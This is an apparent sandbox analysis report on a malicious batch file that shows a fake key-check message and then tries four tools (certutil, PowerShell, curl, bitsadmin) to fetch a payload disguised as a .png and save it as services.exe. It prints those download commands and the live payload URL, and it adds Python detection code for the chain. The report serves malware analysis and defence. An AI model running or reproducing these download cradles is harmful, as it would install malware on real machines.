Analysis Overview
SHA256
6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
Threat Level: Likely malicious
The file frdddd.bat was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-26 17:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:51
Platform
win7-20240708-en
Max time kernel
680s
Max time network
691s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
Files
memory/2692-4-0x000007FEF460E000-0x000007FEF460F000-memory.dmp
memory/2692-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2692-6-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2692-7-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-9-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-8-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-10-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-11-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-12-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 33699b0d456ab857c654d32bb2e3d0dd |
| SHA1 | 41f8ea34091911ce5bd3bb1ae0001b2b7757afe3 |
| SHA256 | 856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567 |
| SHA512 | a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp
| MD5 | 2274ec55bb8524294bd4da2157137a42 |
| SHA1 | 7ca9c4c80357eaa63a7fc356051808eff70bb445 |
| SHA256 | db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe |
| SHA512 | a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8 |
memory/1464-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/1464-19-0x0000000002340000-0x0000000002348000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:48
Platform
win10-20240404-en
Max time kernel
373s
Max time network
398s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5064 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 1708 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 5064 wrote to memory of 1708 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 5064 wrote to memory of 976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 1720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
| PID 5064 wrote to memory of 1720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
Files
memory/4164-3-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp
memory/4164-5-0x000001867BBB0000-0x000001867BBD2000-memory.dmp
memory/4164-6-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/4164-9-0x000001867BEA0000-0x000001867BF16000-memory.dmp
memory/4164-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxc0pd4w.ekv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4164-41-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 900713b658f108100bb7aa144134dbca |
| SHA1 | 7a05dd4d5cd03542c5187c8a3036f30b9d79daf0 |
| SHA256 | c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8 |
| SHA512 | 85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 82bf624e242a520bea827e1597a3b6c3 |
| SHA1 | 44b39896a849a7a8e959be51b63b260d2a5c2703 |
| SHA256 | 8b57b809a4849de8c8341d0d1fcfddf0cb39c81f28a081fe95b0f0aa48ad89fa |
| SHA512 | df229348ee2496d9456235ba0aef84431e66be0ec0a5baa7afa5bb7255d527ae632a8fa7c603e3b2bb137f2175728fe678dc745fc885b49dbf1178615476a774 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:47
Platform
win10v2004-20240709-en
Max time kernel
439s
Max time network
443s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
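The process list above shows one payload URL (`https://files.catbox.moe/83dtmm.png`) fetched four different ways and written as `services.exe` under the user's Temp directory. The detection logic below is an added example, not part of this report and not the sample's own code: it parses constructed Sysmon-style process-creation events (assumed field names `Image`, `CommandLine`, `ParentImage`), recognises the certutil, bitsadmin, curl and `Invoke-WebRequest` download forms, flags the `.png`-to-`.exe` extension mismatch, the user-writable drop directory and the borrowed system-binary name, and groups repeated fetches of the same URL/output pair into a fallback chain. The command lines are the ones in the report; the final benign curl event and `example.com` are made up for contrast.

```python
"""Detection logic for the LOLBin download chain seen in frdddd.bat.

Added example; not part of the sandbox report and not the sample's own code.
Input records are constructed Sysmon event-ID-1-style dicts (assumed field names
Image, CommandLine, ParentImage). Five command lines are taken from the report's
process list; the last event is a benign control case made up for contrast.
"""
import shlex
from dataclasses import dataclass, field
from pathlib import PurePosixPath, PureWindowsPath
from urllib.parse import urlparse

# Names of Windows system binaries that a payload dropped outside C:\Windows may borrow.
SYSTEM_BINARY_NAMES = {"services.exe", "svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
EXEC_SUFFIXES = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js"}
STAGING_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


@dataclass
class Download:
    tool: str
    url: str
    outfile: str
    findings: list = field(default_factory=list)


def _unquote(tok):
    """Strip one matching pair of surrounding quotes, leaving inner quotes intact."""
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'" else tok


def _tokens(cmdline):
    """Split a Windows command line on whitespace, honouring quotes but not backslash escapes."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        toks = cmdline.split()
    return [_unquote(t) for t in toks]


def _value_after(tokens, *flags):
    """Return the token following the first (case-insensitive) occurrence of any flag."""
    low = [t.lower() for t in tokens]
    for flag in flags:
        if flag in low and low.index(flag) + 1 < len(tokens):
            return tokens[low.index(flag) + 1]
    return None


def _first_url(tokens):
    return next((t for t in tokens if t.lower().startswith(("http://", "https://"))), None)


def extract_download(image, cmdline):
    """Return a Download if the process is one of the four cradles the sample uses, else None.

    -EncodedCommand and positional Invoke-WebRequest arguments are deliberately not handled.
    """
    tool = PureWindowsPath(image).name.lower()
    toks = _tokens(cmdline)
    low = [t.lower() for t in toks]
    url = out = None
    if tool == "certutil.exe" and "-urlcache" in low:     # certutil -urlcache [-split] -f URL OUTFILE
        url, out = _first_url(toks), toks[-1]
    elif tool == "bitsadmin.exe" and "/transfer" in low:  # bitsadmin /transfer JOB [...] URL OUTFILE
        url, out = _first_url(toks), toks[-1]
    elif tool == "curl.exe":                              # curl -o OUTFILE URL
        url, out = _first_url(toks), _value_after(toks, "-o", "--output")
    elif tool in ("powershell.exe", "pwsh.exe"):          # powershell -Command "Invoke-WebRequest -Uri URL -OutFile OUTFILE"
        inner = _tokens(_value_after(toks, "-command", "-c") or "")
        if any(t.lower() in ("invoke-webrequest", "iwr") for t in inner):
            url = _value_after(inner, "-uri") or _first_url(inner)
            out = _value_after(inner, "-outfile")
    if url and out:
        return Download(tool=tool, url=url, outfile=out)
    return None


def assess(d):
    """Add the findings that separate a payload drop from an ordinary file download."""
    url_suffix = PurePosixPath(urlparse(d.url).path).suffix.lower()
    out = PureWindowsPath(d.outfile)
    out_suffix = out.suffix.lower()
    out_lower = str(out).lower()
    if out_suffix in EXEC_SUFFIXES and url_suffix != out_suffix:
        d.findings.append(f"url suffix {url_suffix!r} differs from written suffix {out_suffix!r}")
    if any(s in out_lower for s in STAGING_DIRS):
        d.findings.append("written to a user-writable staging directory")
    if out.name.lower() in SYSTEM_BINARY_NAMES and not out_lower.startswith("c:\\windows\\"):
        d.findings.append(f"masquerades as system binary {out.name}")
    return d


def scan(events):
    """Run extraction and assessment over process-creation events; return every download seen."""
    hits = []
    for ev in events:
        d = extract_download(ev["Image"], ev["CommandLine"])
        if d:
            hits.append(assess(d))
    return hits


def retry_chains(hits):
    """Group by (url, outfile): one payload fetched with several tools is a fallback chain like frdddd.bat's."""
    groups = {}
    for h in hits:
        groups.setdefault((h.url.lower(), h.outfile.lower()), set()).add(h.tool)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: the report's command lines plus one benign curl (example.com is a placeholder).
SAMPLE_EVENTS = [
    {"ParentImage": CMD, "Image": PS,
     "CommandLine": r'''PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"'''},
    {"ParentImage": CMD, "Image": r"C:\Windows\system32\certutil.exe",
     "CommandLine": r'certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"'},
    {"ParentImage": CMD, "Image": PS,
     "CommandLine": r'''PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"'''},
    {"ParentImage": CMD, "Image": r"C:\Windows\system32\curl.exe",
     "CommandLine": r'curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\system32\bitsadmin.exe",
     "CommandLine": r'bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\system32\curl.exe",
     "CommandLine": r'curl -o "C:\Users\Admin\Downloads\report.pdf" "https://example.com/report.pdf"'},
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h.tool}: {h.url} -> {h.outfile} {h.findings}")
    print("fallback chains:", retry_chains(hits))
```

The message-box PowerShell command produces no hit because it contains no download cmdlet, and the benign curl produces a hit with no findings; only the four cradle commands carry findings, and `retry_chains` ties them together as one payload fetched with four tools. The per-tool parsing is intentionally narrow (no `-EncodedCommand`, no positional `Invoke-WebRequest` URI), so a production rule should widen it rather than rely on these exact argument orders.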
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 40.58.20.217.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/2616-0-0x00007FF9109F3000-0x00007FF9109F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc3mlmu.fba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2616-10-0x000001594BB20000-0x000001594BB42000-memory.dmp
memory/2616-11-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-12-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-15-0x000001594B7D0000-0x000001594B9EC000-memory.dmp
memory/2616-16-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 614f88cf39eb3223246afec4bf1463b4 |
| SHA1 | 74d738ee6fdada75ac1ef1645073005e3f6b6cfb |
| SHA256 | 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd |
| SHA512 | 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 545200acaf2c8f78ae532a89dc92847f |
| SHA1 | ed204ca3305153883b4a6452d3a51ba5a6d145e1 |
| SHA256 | 70df64fb0f6dd58a197b24edda7d79e43d9f5326dab3559e210ca48f89fef2f2 |
| SHA512 | e0eb48db79189689d56b2a845d416b78e4d2dd9f931423f8cfc28ed4d2f032e7b0f192f17e294eddb259f85de99ff8debdc5ef8f86843c50fc8134ee02b178e1 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:42
Platform
win11-20240709-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| N/A | 127.0.0.1:49827 | | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
Files
memory/2012-0-0x00007FF82AFF3000-0x00007FF82AFF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgowykvb.lxy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2012-9-0x0000029D7C1C0000-0x0000029D7C1E2000-memory.dmp
memory/2012-10-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-11-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-12-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-15-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f33a85941bcb1090d75289d34035310 |
| SHA1 | b24a3c2248b575a78c066866768c6a7fb9f8e06c |
| SHA256 | 169bb5671a611478cb7dc58e7d1b01a5ce2d354591c4a63e7b191b6e7b6dee6c |
| SHA512 | d6065d75737f4016d876cb4ada85b196b1be70e06b552ebae0d51f7b84a01e87151ae81ba3aa584bfe28ce4df69f62e6a37d3918d2b3b02a7b3ebfb3bf7540b5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 962574549d8b04e5eeda54c5284808d0 |
| SHA1 | d37b5af76b44a47e4ce09ea3a3421408a901b7eb |
| SHA256 | 063fe32bc457964b5f53515b749bac5b7012469ce0d0b0fd5ece65206b283060 |
| SHA512 | 7354c6d53d1bc28ad9d027def0e2335a7fab5e02473bf056687dcfc0e3e7b2ad0b3314772747e9b2753d1314ee84ffa220e3e7e310c519d4adede2bba5f1aff6 |